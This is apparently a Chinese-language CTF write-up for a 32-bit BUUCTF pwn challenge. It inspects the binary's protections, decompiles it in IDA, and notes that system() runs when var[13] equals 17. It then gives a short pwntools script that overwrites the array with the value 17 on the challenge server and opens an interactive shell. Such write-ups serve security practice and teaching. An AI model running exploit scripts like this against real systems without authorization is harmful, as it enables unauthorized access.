一、查看文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/a7f3499e6ac7456cac1c32a5bc214ee8.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/2ea64f42383f4f7f9ecb5c0a3b30d8ae.png)
32位,开启了Canary保护。
二、IDA反编译
啥也不清楚,就老办法,拖入IDA进行反编译:
![在这里插入图片描述](https://img-blog.csdnimg.cn/b04a15cd6ca34907932f02b03c854ec9.png)
感觉主函数中给的线索比较清晰,系统调用函数就在主函数中,看带代码是当var[13]==17LL时候执行system函数。
所以我们可以把17填充进去
三、代码
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25456)
p=p32(17)*14
r.sendline(p)
r.interactive()
![在这里插入图片描述](https://img-blog.csdnimg.cn/096a24c3ca444ce5abfcf1b90b43f847.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/87f324cb23984c30ac73c026463eddbd.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ac6499a7313444e1bde3142f8ae42239.png)